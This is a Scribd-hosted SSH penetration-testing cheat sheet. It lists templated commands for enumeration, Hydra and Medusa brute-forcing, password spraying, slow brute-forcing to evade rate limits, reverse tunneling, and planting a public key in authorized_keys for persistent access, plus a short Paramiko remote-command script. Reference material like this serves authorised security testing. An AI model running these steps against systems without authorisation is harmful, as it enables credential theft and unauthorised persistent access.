Scribd
Upload
95 views3 pages

SSH Pentesting

The document outlines various commands and tools for SSH pentesting, including enumeration, brute-forcing, password spraying, and exploiting known vulnerabilities. It also covers techniques for post-exploitation, traffic analysis, and custom exploits using Python's Paramiko library. Additionally, it mentions advanced tools like Metasploit and Pwncat for automated scanning and session management.

Uploaded by

Andrés Ramírez
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
95 views3 pages

SSH Pentesting

The document outlines various commands and tools for SSH pentesting, including enumeration, brute-forcing, password spraying, and exploiting known vulnerabilities. It also covers techniques for post-exploitation, traffic analysis, and custom exploits using Python's Paramiko library. Additionally, it mentions advanced tools like Metasploit and Pwncat for automated scanning and session management.

Uploaded by

Andrés Ramírez
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

SSH Pentesting

Category Command/Tool Description

Enumerating SSH nmap -p 22 --script ssh2- Check SSH algorithms and


Configuration enum-algos <target-ip> encryption methods.

nmap -sV -p 22 --script Discover SSH version and


ssh-hostkey <target-ip> host key.

hydra -l <username> -P
Brute-Forcing SSH Brute-force SSH
<password_list> ssh://
Credentials passwords with Hydra.
<target-ip>

medusa -h <target-ip> -u
Brute-force SSH
<username> -P
passwords with Medusa.
<password_list> -M ssh

hydra -L <user_list> -p Test a common password


Password Spraying <common_password> across multiple
ssh://<target-ip> usernames.

SSH Key-Based ssh -i <private_key> Attempt login with a


Authentication <username>@<target-ip> private key.

Weak SSH Configuration Identify weak SSH


ssh-audit <target-ip>
Testing configurations.

Retrieve SSH banner


Banner Grabbing nc <target-ip> 22
details.

@sukshield.com
Check for default
credentials, hardcoded
Test weak or default
Testing Misconfigurations passwords, or use
configurations.
rockyou.txt for password
lists.

Search for exploits


Exploiting Known searchsploit openssh
matching the SSH
Vulnerabilities <version>
version.

ssh -L <local-
Port Forwarding and port>:<remote- Local port forwarding for
Tunneling host>:<remote-port> SSH tunneling.
<username>@<target-ip>

ssh -R <remote-
port>:<local-host>:<local- Remote port forwarding
port> for reverse tunneling.
<username>@<target-ip>

Check for privilege


Post-Exploitation sudo -l
escalation opportunities.

Check ~/.ssh/ for keys and


Locate private SSH keys.
other sensitive data.

Use tools like mitmproxy


to intercept SSH traffic (if Analyze SSH traffic in a
MITM and Traffic Analysis
SSL/TLS downgrade is controlled environment.
possible).

ssh -J
Chain multiple SSH hops
Bypassing IP Whitelisting <user1>@<jump_host>
using ProxyJump.
<user2>@<target-host>

@sukshield.com
Passwordless Login echo "<your_public_key>" Add your public key to the
Testing >> ~/.ssh/authorized_keys target’s authorized keys.

Measure response times


Detect patterns in timing
Time-Based Attack for authentication errors
to infer valid accounts.
using SSH commands.

hydra -l <username> -P
Slow brute-forcing to
Slow Brute-Force <password_list> -t 1 -w 5
bypass rate-limiting.
ssh://<target-ip>

Write custom scripts with


Python’s Paramiko library
import paramiko
client =
paramiko.SSHClient()
client.set_missing_host_ke
y_policy(paramiko.AutoAd
dPolicy())
client.connect('<target-
Run automated
Custom Exploits ip>',
commands via SSH.
username='<username>',
password='<password>')
stdin, stdout, stderr =
client.exec_command('ls -
la')
print(stdout.read().decod
e())
client.close()
.

Use auxiliary/scanner/ssh
Advanced Tools Metasploit modules for automated
scanning and exploitation.

Manage post-exploitation
Pwncat SSH sessions with an
interactive tool.

@sukshield.com

You might also like